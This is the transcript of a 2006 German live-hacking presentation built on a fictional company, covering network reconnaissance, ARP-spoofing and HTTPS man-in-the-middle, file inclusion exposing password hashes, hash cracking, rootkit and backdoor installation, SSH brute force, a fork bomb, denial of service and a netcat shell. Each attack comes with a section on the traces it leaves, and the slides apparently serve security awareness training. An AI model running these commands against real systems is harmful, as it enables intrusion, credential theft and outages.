14 = \ r\/\/ 8z / 3u55

Größe: px
Ab Seite anzeigen:

Download "14 = \ r\/\/ 8z / 3u55"

Transkript

1 14 = \ r\/\/ 8z / 3u55 4R u / 9 /\/\4 / 1P _ / \/0 / )473 / 00. 4Pr1l _1\/3-4x0ring /\/\4r71 / 9. \/\/u / dr4/\/\ \/\/u / dr4/\/\@7r0 / 1(9 _ 4Rd.(0/\/\ Martin G. Wundram Zur AGENDA Seite: 1

2 IAF NRW BZ Neuss Arbeitstagung Manipulation von Daten 19. April 2006 Live Hacking Martin G. Wundram Martin G. Wundram Zur AGENDA Seite: 2

3 Agenda I.Begrüßung und Braingym II.Was macht TronicGuard? III.Fallbeschreibung: Deutsche-Top-Technologie GmbH IV.Das Netzwerk ausspähen LAN-Angriffe Internet-Angriffe 1.MITM abfangen 2.Physischer Angriff 3.MITM HTTPS-Login abfangen 4.SSHD mit Passwortlogging 5.Shell-Bombe Bonus-Angriffe 16.TinyPHPForum 17.PHPWebsite 18.MS-DNS-Redirect 6.DB-Server kompromittieren 7.Windows XP kompromittieren 8.Frame-Hijacking 9.JavaScript-Injection 10.Ebay Account phishen 11.Eine box r00ten 12.DOS-Angriff gegen SSHD 13.DOS gegen aktive Firewall 14.IDS lahmlegen 15.Versteckter Datenkanal Martin G. Wundram Zur AGENDA Seite: 3

4 Über mich Geschäftsführender Gesellschafter der TronicGuard GmbH 24 Jahre alt Vordiplom Wirtschaftsinformatik Ich freue mich auf die Begegnung mit Ihnen Und bin auch nach dem Vortrag jederzeit erreichbar. Am besten per Mail an: Martin G. Wundram Zur AGENDA Seite: 4

5 Braingym Stefan, Jan, Tim, Iris, Erika und Heide sind im Garten. Plötzlich zieht ein Gewitter auf; es grollt bedrohlich. Die Jungen rennen ins Haus. Doch keine der drei anderen folgt ihnen. Warum nicht? Martin G. Wundram Zur AGENDA Seite: 5

6 Über uns / Braingym Iris, Erika und Heide sind Pflanzen! Komplexe Themen einfach erschließen Bei Unklarheiten jederzeit nachfragen Im gemeinsamen Dialog Antworten erarbeiten Martin G. Wundram Zur AGENDA Seite: 6

7 Martin G. Wundram Zur AGENDA Seite: 7

8 Martin G. Wundram Zur AGENDA Seite: 8

9 Thinkgeek.com: Internet urinal Martin G. Wundram Zur AGENDA Seite: 9

10 Über die Präsentation Überblick: - Gewinnung von Informationen über Netzwerke - Netzwerküberwachung mit Linux - Konzeptionelle und konkrete Sicherheitslücken ausnutzen - Angreifen von innen und von aussen Die Themen können nur eine Anregung geben Thema uninteressant? Überspringen! Martin G. Wundram Zur AGENDA Seite: 10

11 Agenda III.Fallbeschreibung: Deutsche-Top-Technologie GmbH IV.Das Netzwerk ausspähen LAN-Angriffe 1.MITM abfangen 2.Physischer Angriff 3.MITM HTTPS-Login abfangen 4.SSHD mit Passwortlogging 5.Shell-Bombe Bonus-Angriffe 16.TinyPHPForum 17.PHPWebsite 18.MS-DNS-Redirect Internet-Angriffe 6.DB-Server kompromittieren 7.Windows XP kompromittieren 8.Frame-Hijacking 9.JavaScript-Injection 10.Ebay Account phishen 11.Eine box r00ten 12.DOS-Angriff gegen SSHD 13.DOS gegen aktive Firewall 14.IDS lahmlegen 15.Versteckter Datenkanal Martin G. Wundram Zur AGENDA Seite: 11

12 Was macht TronicGuard? Internet Service Provider IT-Infrastruktur: Firewalls, File-Server, Backup-Server,... Webentwicklung, Content Management Systeme Training Sachverständigentätigkeit im Bereich Unix-Systeme Support für FreeBSD und OpenBSD Martin G. Wundram Zur AGENDA Seite: 12

13 Fallbeschreibung: Deutsche-Top-Technologie GmbH Wer wir sind (Ihre fiktive Rolle im Unternehmen): Seit kurzem Projektleiter in der Kreativ-Abteilung (Aussenstelle) der DTT GmbH. Was die DTT GmbH macht: Technologieunternehmen, betreibt Grundlagenforschung im Sanitärbereich ->Fantasieunternehmen! Martin G. Wundram Zur AGENDA Seite: 13

14 Fallbeschreibung: Deutsche-Top-Technologie GmbH Was wir machen: Mit 12 Mitarbeitern neue Geschäftsideen entwickeln. Ein Administrator betreut die vorhandenen Computer. Unsere Idee: Das wertvolle Know-How der Firma stehlen und gewinnbringend an die Konkurrenz verkaufen. Martin G. Wundram Zur AGENDA Seite: 14

15 Fallbeschreibung: Deutsche-Top-Technologie GmbH Das wissen wir: Permanter Internetzugang Alles Wichtige in der Datenbank unserer Aussenstelle Der Inhalt wichtiger s wird mit einem speziellen Programm verschlüsselt, wenn wertvolle Geschäftsgeheimnisse an die Zentrale gesendet werden Unser PC startet Windows XP Helix o.ä. haben wir mitgebracht Martin G. Wundram Zur AGENDA Seite: 15

16 Das Netzwerk ausspähen??????????????? Wo sind wir? Wer sind wir? Gibt es Andere, und wer sind die? Was können wir über das Netzwerk und seine angeschlossenen Geräte erfahren? Infrastruktur! Martin G. Wundram Zur AGENDA Seite: 16

17 Das Netzwerk ausspähen z.b. von Windows XP aus: Eigene IP-Adresse, Subnetz-Maske, Standardgateway und DNS-Server notieren (cmd -> ipconfig -> nslookup) Traceroute ins Internet um weitere Gateways und Router hinter dem Default-Gateway zu finden (cmd -> tracert <host>) Einstellungen im Browser auf Proxy-Konfiguration prüfen Wichtig: Den eigenen Computer auf DHCP-Adressvergabe stellen! Martin G. Wundram Zur AGENDA Seite: 17

18 Das Netzwerk ausspähen Ist das Netzwerk geswitcht, oder wird ein Hub verwendet? -> Traffic im promiscuous-mode sniffen (tcpdump, urlsnarf, ettercap o.ä. verwenden) HUB? SWITCH? ??? MAC A Ethernet-Frame: MAC A -> MAC D MAC B MAC C MAC D Martin G. Wundram Zur AGENDA Seite: 18

19 Das Netzwerk ausspähen Computer 1 Computer 2 Ethernet-Frame: MAC A -> MAC D TCP/IP-Referenzmodell Martin G. Wundram Zur AGENDA Seite: 19

20 Das Netzwerk ausspähen Encapsulation / Kapselung Martin G. Wundram Zur AGENDA Seite: 20

21 Das Netzwerk ausspähen Promiscuous mode Netzwerkkarten können in den promiscuous mode gesetzt werden Martin G. Wundram Zur AGENDA Seite: 21

22 Das Netzwerk ausspähen UNIXoide Systeme haben eingebaute Hilfen: man <genaues suchwort> apropos <teilwort> Nutzen Sie diese!! tcpdump: Gibt die Header von Paketen eines Netzwerkinterfaces aus. Kann durch Filter konfiguriert werden. Ein Unix-Standardtool. Nutzt das Interface bpf (Berkley Packet Filter). man tcpdump. Martin G. Wundram Zur AGENDA Seite: 22

23 Das Netzwerk ausspähen SWITCH oder HUB? Martin G. Wundram Zur AGENDA Seite: 23

24 Das Netzwerk ausspähen Andere Geräte im Netzwerk finden und deren Dienste und ihr Betriebsystem prüfen: nmap -v -O nmap: Nmap network exploration tool and security scanner. man nmap Bei Systemen, die nicht erkannt werden, telnet, netcat oder nmap -v -sv <host> auf offene Ports zur Informationsgewinnung. Router? Martin G. Wundram Zur AGENDA Seite: 24

25 Das Netzwerk ausspähen WAN / Internet DSL/ISDN-Router, Gateway und Firewall, OpenBSD Switch Fileserver, SuSE Linux Unser Hacker-PC, Helix Interne Datenbank und Webserver, FreeBSD 12 Windows XP Clients (Der Administrator und die übrigen Mitarbeiter) Martin G. Wundram Zur AGENDA Seite: 25

26 Das Netzwerk ausspähen Spuren? Promiscuous-Mode kann erkannt werden (ARP-Tests) Scannen kompletter Subnets kann von NIDS (Network Intrusion Detection System, z.b. snort) bemerkt werden Vollständige Verbindungen auf offene Ports (z.b. mit netcat) hinterlassen Logfile-Einträge: May 14 15:52:37 linuxbox sshd[3820]: Did not receive identification string from Martin G. Wundram Zur AGENDA Seite: 26

27 Angriff 1: s abfangen und Verschlüsselung knacken Beschreibung Wir wissen, dass der Abteilungsleiter Herr Meier in Kürze eine Produktstudie per an die Zentrale senden wird. Daher vergiften wir seinen ARP-Cache und den des Gateways, Können voll-duplex seine Daten mithören und Die abfangen Anschließend: Verschlüsselte knacken Martin G. Wundram Zur AGENDA Seite: 27

28 Angriff 1: s abfangen und Verschlüsselung knacken Sniffing-Grundlagen Wie können Daten in einem geswitchen LAN abgehört werden? SWITCH :40:63:ca:b9:42 Sniffer 00:40:63:c1:1c:cc Switches erkennen das Ziel eines Datenpakets anhand der Ziel-MAC (Media Access Control) und stellen es nur diesem Ziel zu: Punkt-zu-Punkt-Verbindung Martin G. Wundram Zur AGENDA Seite: 28

29 Angriff 1: s abfangen und Verschlüsselung knacken Sniffing-Grundlagen arpspoof (ARP-Poisoning) Switch WAN / Internet Opfer MAC A ARP-Tabelle des Opfers: IP Gateway -> MAC C Sniffer MAC B Gateway MAC C Gezieltes Manipulieren eines einzelnen Hosts zur Überwachung Martin G. Wundram Zur AGENDA Seite: 29

30 Angriff 1: s abfangen und Verschlüsselung knacken Sniffing-Grundlagen arpspoof (ARP-Poisoning) Switch WAN / Internet Opfer MAC A ARP-Tabelle des Opfers: IP Gateway -> MAC B Sniffer MAC B Gateway MAC C Martin G. Wundram Zur AGENDA Seite: 30

31 Angriff 1: s abfangen und Verschlüsselung knacken Sniffing-Grundlagen ARP ist ein verbindungsloses Protokoll -Computer speichern gemeldete Einträge (Reply) auch ohne diese vorher angefragt zu haben (Request) -Permanente ARP-Replies an das Opfer(Antwortpake) mit Zuordnung: IP-des-Gateway <-> MAC-des-Sniffers Konsequenz: Daten werden vom Opfer nicht mehr an das Gateway, sondern an den Sniffer gesendet Manipulation lediglich auf Ethernet-Ebene! Martin G. Wundram Zur AGENDA Seite: 31

32 Angriff 1: s abfangen und Verschlüsselung knacken Die abfangen (Von: Helix) IP-Forwarding aktivieren echo 1 > /proc/sys/net/ipv4/ip_forward Herrn Meier's PC vergiften arpspoof -t IP_OPFER IP_GATEWAY Das Gateway vergiften arpspoof -t IP_GATEWAY IP_OPFER Herrn Meier's s abfangen tethereal -V "host IP_OPFER && port 25" tee sniffed.messages Martin G. Wundram Zur AGENDA Seite: 32

33 Angriff 1: s abfangen und Verschlüsselung knacken Die auswerten (Von: Helix oder Windows) Der Inhalt der Mail liegt im Rohformat in sniffed.messages vor Die Mail ist, wie erwartet, verschlüsselt Herr Meier schreibt keine Großbuchstaben und endet alle seine s wie folgt: herr meier deutsche-top-technologie gmbh Knacken Sie die Mail! Martin G. Wundram Zur AGENDA Seite: 33

34 Angriff 1: s abfangen und Verschlüsselung knacken Spuren? Die ARP-Tabelle der vergifteten Hosts ändert sich temporär ARP-Spoofing kann von einem NIDS zum Beispiel mit dem Tool arpwatch erkannt und gemeldet werden Martin G. Wundram Zur AGENDA Seite: 34

35 Angriff 2: DB-Server kompromittieren und DB kopieren Beschreibung Der Datenbankserver der Aussenstelle ist von besonderem Interesse, da in der Datenbank das Know-How der Firma gespeichert ist. Unser Ziel: In den DB-Server eindringen und die DB kopieren. Was wir wissen: Auf dem Datenbankserver läuft ein Webserver. Als Datenbanksystem wird MySQL verwendet. Martin G. Wundram Zur AGENDA Seite: 35

36 Angriff 2: DB-Server kompromittieren und DB kopieren Martin G. Wundram Zur AGENDA Seite: 36

37 Angriff 2: DB-Server kompromittieren und DB kopieren Das Web-Frontend untersuchen Das Frontend wurde in PHP programmiert phpinfo.php liefert hier Informationen über den Webserver und die PHP-Umgebung ( phpinfo() ) Einzelne Unterpunkte werden als PHP-Datei mit der Endung.inc im Unterordner inc eingebunden Übergabe der gewünschten Datei per GET in include Beliebige andere Übergaben möglich: Martin G. Wundram Zur AGENDA Seite: 37

38 Angriff 2: DB-Server kompromittieren und DB kopieren Das Web-Frontend untersuchen at:!:12551:0:99999:7::: bin:*:8902:0:10000:::: daemon:*:8902:0:10000:::: ftp:*:8902:0:10000:::: games:*:8902:0:10000:::: lp:*:8902:0:10000:::: mail:*:8902:0:10000:::: man:*:8902:0:10000:::: mysql:!:12551:0:99999:7::: news:*:8902:0:10000:::: nobody:*:8902:0:10000:::: ntp:!:12551:0:99999:7::: postfix:!:12551:0:99999:7::: root:fg4re/3vax6aw:12551:0:10000:::: sshd:!:12551:0:99999:7::: uucp:*:8902:0:10000:::: wwwrun:*:8902:0:10000:::: achim:3bxoqijnpf3he:12551:0:99999:7:-1:: difficult:tgf0ouuomo3e6:12552:0:99999:7:-1:: elite:0ep61aoxfplr6:12552:0:99999:7:-1:: hacker:fzchoc7bouzns:12552:0:99999:7:-1:: quark:iwk7ky7u7akp2:12552:0:99999:7:-1:: Der Webserver läuft hier als User root und kann daher jede System- Datei öffnen! Martin G. Wundram Zur AGENDA Seite: 38

39 Angriff 2: DB-Server kompromittieren und DB kopieren Die Passwort-Hashes knacken Passwörter in Linux in der Vergangenheit per default mit 40Bit DES gehasht: root:fg4re/3vax6aw Die Passwörter mit john ermitteln John läuft unter Linux/Unix und Win32 Wörterbuch-Attacken mit Permutationen Brute-Force-Attacken (alle Kombinationen ausprobieren) Martin G. Wundram Zur AGENDA Seite: 39

40 Angriff 2: DB-Server kompromittieren und DB kopieren Die Passwort-Hashes knacken Sehr schnelle Wörterbuch- und Brute-Force-Attacken: DES: ~ Passwörter/Sekunde FreeBSD MD5: ~4300 P/s OpenBSD Blowfish: ~256 P/s NT LM DES: ~ P/s (1,7GHz-System, Intel Pentium-M) Hier: Worst-Case-Laufzeiten für DES: a-z, 4 Zeichen: 2,8s a-za-z0-9, 4 Zeichen: 92s a-za-z0-9, 6 Zeichen: 99h a-za-z0-9, 8 Zeichen: 43y Martin G. Wundram Zur AGENDA Seite: 40

41 Angriff 2: DB-Server kompromittieren und DB kopieren Einloggen und die Datenbank kopieren Als Root per SSH einloggen (z.b. mit putty von Windows aus) Die Datenbank in /var/lib/mysql mit tar/gzip komprimieren: tar -czf /var/datenbank.tgz /var/lib/mysql Abschließend die Datenbank kopieren (z.b. mit scp von Linux aus): scp /zielordner_auf_meinem_pc Martin G. Wundram Zur AGENDA Seite: 41

42 Angriff 2: DB-Server kompromittieren und DB kopieren Backdoor installieren Die DB soll regelmäßig kopiert werden, aber: Die Passwörter könnten sich ändern Eventuell wird der Webserver irgendwann sicher konfiguriert Daher: Backdoor installieren! Versteckter Remote-Zugriff als Root ohne Passwort Proofs of Concept: Martin G. Wundram Zur AGENDA Seite: 42

43 Angriff 2: DB-Server kompromittieren und DB kopieren Spuren? Beispiel (Debian Hack 2003): access_log speichert alle Zugriffe auf den Webserver: less /var/log/httpd-access.log utmp und wtmp speichern alle Logins: last und man wtmp SSH-Logins in /var/log/auth.log Die History-Funktion der Shell (bash) speichert die eingegebenen Befehle: history Martin G. Wundram Zur AGENDA Seite: 43

44 Angriff 2: DB-Server kompromittieren und DB kopieren Spuren? Die (hier sehr simple) Backdoor erscheint in der Prozess-Liste: ps aux Eintrag für den Start der Backdoor in Startup-Skripten Die atime (Zugriffs-Zeitstempel) wird für alle geöffneten Dateien/Ordner aktualisiert Martin G. Wundram Zur AGENDA Seite: 44

45 Angriff 3: Lokalen Zugriff ausnutzen und Root werden Beschreibung Es bietet sich die Gelegenheit, ungestört direkt an das OpenBSD-Gateway und an den Linux-Fileserver heranzutreten. Harter Reboot, um danach das Root-Passwort neu zu setzen Martin G. Wundram Zur AGENDA Seite: 45

46 Angriff 3: Lokalen Zugriff ausnutzen und Root werden OpenBSD-Gateway lokal Per Reset harten Neustart durchführen Am Boot-Prompt mit der Option boot -s Single-User-Mode starten Mit grep ^root /etc/master.passwd den alten Hash anzeigen und eventuell sichern Die /-Partition mit Schreibrechten re-mounten: mount -o rw / Mit passwd eine neues Passwort vergeben (z.b ) Neustarten Martin G. Wundram Zur AGENDA Seite: 46

47 Angriff 3: Lokalen Zugriff ausnutzen und Root werden Windows XP lokal Per Reset harten Neustart durchführen Mit Linux-LiveCD von CD starten Passwort-Rücksetzer aktivieren Das Admin-Passwort blanken Zugriff jetzt ohne Passwort möglich Alternativ: Bisheriges Passwort durch Neues überschreiben Martin G. Wundram Zur AGENDA Seite: 47

48 Angriff 3: Lokalen Zugriff ausnutzen und Root werden Spuren? Der Neustart wird ebenfalls in wtmp gespeichert: last uptime Das Dateisystem muss geprüft werden (fsck) Unter Umständen zeitintensiv Im schlimmsten Fall: Partition korrupt Zeitstempel und Signatur (MD5) der Passwortdatei ändern sich Martin G. Wundram Zur AGENDA Seite: 48

49 Angriff 4: Kompromittierung eines Windows XP-Systems Beschreibung Wir übernehmen hier die Rolle des ungeliebten Controllers, der ständig die Löhne senken will. Wir haben dass Gefühl, nicht besonders beliebt zu sein... Wir sitzen vor unserem PC mit Windows XP und ein Kollege schickt per Mail einen Link auf die Seite: Da wir auf Sicherheit achten, benutzen wir den Browser Firefox Martin G. Wundram Zur AGENDA Seite: 49

50 Angriff 4: Kompromittierung eines Windows XP-Systems Die Javaskript-Schwachstelle Durch eine Lücke im Firefox können wir per Javaskript eine Batchdatei auf dem Opfer-System anlegen und diese mit den Rechten des angemeldeten Benutzers ausführen. Das Batchfile lädt per FTP eine bösartige Programmdatei und belastendes Bildmaterial herunter und führt die Programmdatei dann aus. Danach werden bis auf die Bilder alle Spuren entfernt. Zusätzlich wird die Hosts-Datei manipuliert Martin G. Wundram Zur AGENDA Seite: 50

51 Angriff 4: Kompromittierung eines Windows XP-Systems Spuren? Der Browser cached die aufgerufene Seite Die DOS-Box ist kurze Zeit zu sehen Die gelöschten Dateien werden nicht überschrieben und könnten daher wiederhergestellt werden Der FTP-Download könnte vom Gateway protokolliert werden Eine lokale Firewall könnte den Vorgang erkennen und sogar unterbinden Die Manipulation der Hosts-Datei ist natürlich leicht zu erkennen Martin G. Wundram Zur AGENDA Seite: 51

52 Angriff 5: Frame-Hijacking Beschreibung Die DTT GmbH wickelt ihr Banking online bei der Sparkasse XY ab (PIN/TAN). Jeden Tag um 10:00 Uhr fragt Herr Meier den Kontostand ab und überweist fällige Rechnungen. Um diese Zeit schicken wir Ihm eine präparierte Mail mit einem verlockenden Link. Mit etwas Glück kann der Content-Frame gegen einen eigenen getauscht werden. Auch bei SSL-Verbindung ohne Warnung. (Betrifft u.a. Internet Explorer und Mozilla bis 1.7.2) Martin G. Wundram Zur AGENDA Seite: 52

53 Angriff 5: Frame-Hijacking Mozilla installieren! Martin G. Wundram Zur AGENDA Seite: 53

54 Angriff 5: Frame-Hijacking Spuren? Es wird eine weitere Website nachgeladen. Diese hinterlässt wie üblich Spuren im Verlauf, Cache, Proxy- Log, Proxy-Cache,... Martin G. Wundram Zur AGENDA Seite: 54

55 Angriff 6: JavaScript-Injection Beschreibung JavaScript-Injection: In Anlehnung an Angriff 2 wollen wir hier einer anfälligen Webseite bösartigen JavaScript-Code übergeben. Der Browser des Opfers führt diesen Code dann in der Sicherheitszone der betreffenden Website aus. Martin G. Wundram Zur AGENDA Seite: 55

56 Angriff 6: JavaScript-Injection Spuren? Log-entry im Webserver: [09/Sep/2004:20:22: ] "GET /inject/index.php?eingabe=%68%61%6c%6c%6f HTTP/1.1" [...] Wie üblich Spuren im Verlauf, Cache, Proxy-Log, Proxy-Cache,... Martin G. Wundram Zur AGENDA Seite: 56

57 Angriff 7: HTTPS-Login Man-in-the-Middle abfangen Beschreibung Der durch die verdächtigen Aktivitäten der letzten Zeit verunsicherte Systemadministrator verwendet seinen Webmailer mittlerweile nur noch per SSL-geschützter Verbindung. Das Ziel ist, trotz SSL-Verbindung Benutzername und Kennwort des Administrators herauszufinden. ->dnsspoof, webmitm Martin G. Wundram Zur AGENDA Seite: 57

58 Angriff 7: HTTPS-Login Man-in-the-Middle abfangen SSL-Zertifikat Zertifikat ausgestellt für FQDN! Martin G. Wundram Zur AGENDA Seite: 58

59 Angriff 7: HTTPS-Login Man-in-the-Middle abfangen dnsspoof Access-Router WAN / Internet Firewall, DNS-Server 3. DNS-Reply: Opfer 1. Browser: 2. DNS-Query: 4. Browser baut Verbindung auf zu: und zeigt an: Martin G. Wundram Zur AGENDA Seite: 59

60 Angriff 7: HTTPS-Login Man-in-the-Middle abfangen dnsspoof Access-Router WAN / Internet Firewall, DNS-Server 4. DNS-Reply: Opfer 1. Browser: 2. DNS-Query: 5. Browser baut Verbindung auf zu: und zeigt an: Hacker / MITM 3. Spoofed DNS-Reply: Hacker baut eigene SSL-Verbindung auf zu: Transparenter HTTP-Proxy zeigt Opferdaten im Klartext an Martin G. Wundram Zur AGENDA Seite: 60

61 Angriff 7: HTTPS-Login Man-in-the-Middle abfangen Hintergrund Auflösung von FQDN --> IP ist Schwachstelle. Durch Manipulation dieser Zuordnung Umbiegen möglich. Zertifikate normalerweise für FQDN's ausgestellt. Manipulation auch z.b. durch geändertes hosts-file möglich. Keine Warnung, wenn das eigene Zertifikat vom Browser als gültig erkannt wird (z.b. Thawte, Verisign,...). Achtung bei Aufruf über IP: Martin G. Wundram Zur AGENDA Seite: 61

62 Angriff 7: HTTPS-Login Man-in-the-Middle abfangen IP-Forwarding echo 1 > /proc/sys/net/ipv4/ip_forward Arpspoof Opfer arpspoof -t Arpspoof Gateway arpspoof -t Datei anlegen host mit eintrag IP-HACKER dnsspoof ( man dnsspoof ) webmitm -dd Zertifikat erstellen (Den Anweisungen folgen) Martin G. Wundram Zur AGENDA Seite: 62

63 Angriff 7: HTTPS-Login Man-in-the-Middle abfangen Spuren? Auf dem Client-PC: Unter Umständen keinerlei Spuren. Manipulation direkt im DNS-Server möglich. Evtl. (zwischen)gespeichertes Zertifikat. Auf dem eigentlichen Server: Die IP/Hostname des MITM- Systems statt des Opfer-Hosts. Martin G. Wundram Zur AGENDA Seite: 63

64 Angriff 8: Ebay Account phishen Beschreibung Jetzt wollen wir den privaten Ebay Account des Systemadministrators hacken. Eine vermeintliche E-Bay-Mail, die offensichtlich auf ebay.de verlinkt, in Wirklichkeit aber auf ein gefälschtes Login-Formular auf unserem eigenen Server verweist, wird hier wohl ausreichen... May/ html Martin G. Wundram Zur AGENDA Seite: 64

65 Angriff 9: Webserver hacken und Rootkit installieren Beschreibung Da die Software des Fileservers veraltet ist (SuSE Linux 8.0) haben wir es hier mit einem potentiell einfachen Ziel zu tun. Um an die Daten zu kommen, müssen wir Zugriff auf den Root- Account bekommen. Ein Rootkit sorgt dafür, dass wir auch in Zukunft bequemen Zugriff auf das System haben. Martin G. Wundram Zur AGENDA Seite: 65

66 Angriff 9: Webserver hacken und Rootkit installieren Systemzugriff erlangen Oft werden sehr schlechte Benutzername/Kennwort- Kombinationen wie admin/admin oder admin/1234 vergeben. SSH-Verbindung auf datenbank: ssh Kennwort h4cker und dann./ssh-brute passwords Oder wenn expect auf eigenem System installiert: ftp und ssh-brute und passwords downloaden Martin G. Wundram Zur AGENDA Seite: 66

67 Angriff 9: Webserver hacken und Rootkit installieren Userrechte erhöhen Uname -a -> Kernel Für so einen alten Kernel gibt es etliche local root exploits z.b. oder FTP-Download von Exploit auf dem Opfer-System kompilieren: gcc -o elflbl elflbl.c Exploit ausführen: chmod 755 elflbl; elflbl Martin G. Wundram Zur AGENDA Seite: 67

68 Angriff 9: Webserver hacken und Rootkit installieren Rootkit installieren Damit wir auch in Zukunft Root-Zugriff haben, ohne erneut in das System einbrechen zu müssen, installieren wir jetzt ein Rootkit. Vom Opfer-System FTP auf und Download von dk.tar.gz und inst -> Mit dk.tar.gz testen wir ob bereits ein SucKIT installiert ist -> Mit inst installieren wir ein eigenes SucKIT Martin G. Wundram Zur AGENDA Seite: 68

69 Angriff 9: Webserver hacken und Rootkit installieren Spuren? Datenauswertung des Systems machen! Martin G. Wundram Zur AGENDA Seite: 69

70 Angriff 10: DOS-Angriff gegen den sshd des Webservers Beschreibung Um zu verhindern, dass sich der Administrator während des Angriffs per SSH mit dem Server verbindet, zehren wir einfach alle Slots durch einen simplen DOS auf: 10x: ssh Jetzt nochmal: ssh Auszug aus /etc/ssh/sshd_config: MaxStartups 10 Martin G. Wundram Zur AGENDA Seite: 70

71 Angriff 10: DOS-Angriff gegen den sshd des Webservers Spuren? Reguläre Einträge für ssh-verbindungsversuche die durch einen timeout beendet wurden (LoginGraceTime {z.b. 120} beachten) Martin G. Wundram Zur AGENDA Seite: 71

72 Angriff 11: SSHD mit Passwortlogging Beschreibung: Erweiterte Systemprotokollierung Ein befreundeter Administrator bittet uns, während seines Urlaubs auf den zentralen Uni-Server aufzupassen. Wir nutzen die Gelegenheit um an ein paar Passwörter zu kommen. ssh Kennwort: mwadmin / root-kennwort: Jetzt auf Benutzerverbindungen warten: ssh user_xyq@ Sniff-Datei: /root/passwoerter Martin G. Wundram Zur AGENDA Seite: 72

73 Angriff 12: Shell-Bombe Beschreibung Stillstand auf einem Unix-System erzeugen: ssh ulimit :(){ : :& };: Martin G. Wundram Zur AGENDA Seite: 73

74 Angriff 13: DOS gegen aktive Firewall Beschreibung Manche Firewalls ergreifen aktiv Gegenmaßnahmen bei (vermeintlichen) Angriffen Proof of Concept: block in quick on $interface from <sshblock> to any pass in quick on $interface proto tcp from any port > 1023 to $interface2 \ port 22 keep state \ (max-src-conn 10, max-src-conn-rate 5/15, overload <sshblock> flush) Test mit lokaler Firewall Martin G. Wundram Zur AGENDA Seite: 74

75 Angriff 14: IDS lahmlegen Beschreibung (N)IDS (Network) Intrusion Detection Systems versuchen sicherheitsrelevante Vorfälle zu erkennen und u.u. sogar Gegenmaßnahmen durchzuführen Sensoren versorgen diese Systeme mit den nötigen Daten/Datenpaketen Um ungestört und unerkannt im Netz der DTT zu arbeiten, werden wir die Sensoren jetzt ausschalten Martin G. Wundram Zur AGENDA Seite: 75

76 Angriff 14: IDS lahmlegen Proof of Concept tcpdump als Sensor downloaden Kompilieren: gcc -o xtcpdump-bgp-dos xtcpdump-bgp-dos.c Ausführen:./xtcpdump-bgp-dos Lists/securityfocus/bugtraq/ /0448.html Martin G. Wundram Zur AGENDA Seite: 76

77 Angriff 15: Versteckter Datenkanal Beschreibung Der Administrator der DTT hat wegen der vielen Sicherheitsvorfälle in der letzten Zeit direkten Zugriff ins Internet gesperrt. Connectivity jetzt nur noch durch einen HTTP-Proxy Wie können wir doch noch unsere eigenen Netzwerkprotokolle und unsere eigenen Server erreichen?? Martin G. Wundram Zur AGENDA Seite: 77

78 Angriff 15: Versteckter Datenkanal httptunnel Bidirektionale, getunnelte Verbindung in HTTP-Requests Der Client übermittelt einen POST und erhält darauf eine Antwort. An den jeweiligen Strom werden nachfolgende Daten angehängt. Martin G. Wundram Zur AGENDA Seite: 78

79 Angriff 15: Versteckter Datenkanal Martin G. Wundram Zur AGENDA Seite: 79

80 Angriff 15: Versteckter Datenkanal Martin G. Wundram Zur AGENDA Seite: 80

81 Angriff 15: Versteckter Datenkanal Httptunnel verwenden Telnet-Server bauen (telnetd nicht in Knoppix-STD enthalten): nc -l -e /bin/bash -p 9100 httptunnel-serverkomponente starten: hts -F localhost: httptunnel-clientkomponente starten: htc -F 23 localhost:80 Ethereal starten: ethereal (Interface lo, nach dem capture: Display-Filter http) Telnet-Verbindung starten : nc localhost 23 Martin G. Wundram Zur AGENDA Seite: 81

82 Angriff 16: TinyPHPForum Beschreibung Googlen: powered tinyphpforum Beispiel1: Beispiel2: Martin G. Wundram Zur AGENDA Seite: 82

83 Angriff 17: PHPWebsite Beschreibung Martin G. Wundram Zur AGENDA Seite: 83

84 Angriff 17: PHPWebsite Beschreibung Martin G. Wundram Zur AGENDA Seite: 84

85 Angriff 17: PHPWebsite Beschreibung Martin G. Wundram Zur AGENDA Seite: 85

86 G e s c h a f f t! V i e l e n D a n k u n d b i s b a l d! Martin G. Wundram Zur AGENDA Seite: 86

WordPress lokal mit Xaamp installieren

WordPress lokal mit Xaamp installieren WordPress lokal mit Xaamp installieren Hallo und willkommen zu einem weiteren Teil der WordPress Serie, in diesem Teil geht es um die Lokale Installation von WordPress mithilfe von Xaamp. Kurz und knapp

Mehr

Praktikum IT-Sicherheit

Praktikum IT-Sicherheit IT-Sicherheit Praktikum IT-Sicherheit - Versuchshandbuch - Aufgaben Angriffstechniken In diesem Versuch werden verschiedene Angriffstechniken anhand von Beispielen vorgestellt. Die Ausarbeitung der Übungen

Mehr

Anleitung zum Computercheck Windows Firewall aktivieren oder eine kostenlose Firewall installieren

Anleitung zum Computercheck Windows Firewall aktivieren oder eine kostenlose Firewall installieren Anleitung zum Computercheck Windows Firewall aktivieren oder eine kostenlose Firewall installieren Ziel der Anleitung Sie möchten ein modernes Firewallprogramm für Ihren Computer installieren, um gegen

Mehr

Tutorial - www.root13.de

Tutorial - www.root13.de Tutorial - www.root13.de Netzwerk unter Linux einrichten (SuSE 7.0 oder höher) Inhaltsverzeichnis: - Netzwerk einrichten - Apache einrichten - einfaches FTP einrichten - GRUB einrichten Seite 1 Netzwerk

Mehr

Einrichtungsanleitung Router MX200

Einrichtungsanleitung Router MX200 Einrichtungsanleitung Router MX200 (Stand: 30. Januar 2015) Zur Inbetriebnahme des MX200 ist zusätzlich die beiliegende Einrichtungsanleitung LTE- Paket erforderlich. Diese steht alternativ auch auf der

Mehr

Hilfestellung. ALL500VDSL2 Rev.B & ALL02400N. Zugriff aus dem Internet / Portweiterleitung / Fernwartung. Router. Endgeräte. lokales.

Hilfestellung. ALL500VDSL2 Rev.B & ALL02400N. Zugriff aus dem Internet / Portweiterleitung / Fernwartung. Router. Endgeräte. lokales. ALL500VDSL2 Rev.B & ALL02400N Zugriff aus dem Internet / Portweiterleitung / Fernwartung LAN WAN WWW Router Endgeräte lokales Netzwerkgerät Hilfestellung Im Folgenden wird hier Schritt für Schritt erklärt

Mehr

Drägerware.ZMS/FLORIX Hessen

Drägerware.ZMS/FLORIX Hessen Erneuerung des ZMS Nutzungs-Zertifikats Lübeck, 11.03.2010 Zum Ende des Monats März 2010 werden die Zugriffszertifikate von Drägerware.ZMS/FLORIX Hessen ungültig. Damit die Anwendung weiter genutzt werden

Mehr

INTERNETZUGANG WLAN-ROUTER ANLEITUNG FIRMWARE-UPDATE SIEMENS

